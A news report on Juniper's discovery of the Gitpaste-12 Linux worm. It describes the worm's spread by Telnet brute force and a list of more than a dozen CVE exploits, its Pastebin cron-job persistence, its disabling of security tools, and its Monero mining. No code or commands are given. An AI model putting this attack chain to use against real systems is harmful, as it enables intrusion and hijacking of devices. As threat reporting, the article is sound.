Researchers at Juniper Networks have discovered a Linux scripting malware that has the functionality of a worm. The analysis showed that Gitpaste-12, as Juniper called it, uses brute force and exploits to self-propagate. The new bot is also able to load additional modules by accessing GitHub and Pastebin.
Gitpaste-12 first came to the attention of experts on October 15. Judging by the commits that Juniper studied, the codes of the new malware appeared on GitHub in early July. Examining the Gitpaste-12 shell script samples revealed test code indicative of a project incomplete. At the moment, the malware is capable of attacking Linux servers with x86 architecture and IoT devices based on ARM and MIPS chips.
One of its modules is responsible for the bot’s self-propagation to other devices. Testing has shown that this script selects for the attack an arbitrary block of / 8 addresses allocated according to CIDR (Classless Inter-Domain Routing – a method of classless addressing in IP-based networks), and begins to iterate over all addresses in this range. One variation of the script also opens ports 30004 and 30005 to receive shell commands.
To download its copy to the target device, Gitpaste-12 tries to guess the password for the Telnet service or uses an exploit – there are more than a dozen of them in the malware arsenal:
- CVE-2017-14135 for the WebAdmin extension for the OpenDreamBox assembly;
- CVE-2020-24217 for IPTV / H.264 / H.265 video encoders on HiSilicon chips;
- CVE-2017-5638 for the Apache Struts framework
- CVE-2020-10987 for Tenda routers;
- CVE-2014-8361 for the Miniigd daemon in the Realtek SDK;
- CVE-2020-15893 for UPnP stack in D-Link routers;
- CVE-2013-5948 for Asus routers; EDB-ID: 48225 for Netlink GPON routers; EDB-ID: 40500 for AVTECH IP cameras;
- CVE-2019-10758 for MongoDB DBMS web interface;
- CVE-2017-17215 for Huawei HG532 WiFi routers .
Having penetrated the target system, Gitpaste-12 connects to Pastebin and, using the link provided by the operators, loads the recursive script. For a new script, a cron task is created on the device to be executed with an interval of 1 minute. According to experts, this is necessary for receiving updates via Pastebin.
Gitpaste-12 then downloads the shadu1 module from GitHub and initiates its launch. The purpose of this scenario is to eliminate potential interference. It tries to block the default system defenses: firewall rules, SELinux access control, AppArmor security module, and more common attack monitoring / prevention programs.
Notably, shadu1 is also capable of shutting down cloud protection agent applications on command. Comments in Chinese were found in the script code. Based on these findings, the researchers suggested that the authors of Gitpaste-12 intend to use it to attack the cloud infrastructure of Alibaba and Tencent.
Their ultimate goal may be the extraction of Monero at the expense of other people’s capacities: judging by the contents of the configuration file, the malware can run the XMRig cryptominer. Since Gitpaste-12 was recently discovered, it is still poorly detected by antiviruses from the VirusTotal collection . Thanks to Juniper’s intervention, the links to Pastebin associated with the bot were removed, and the Git repository with malicious files was closed.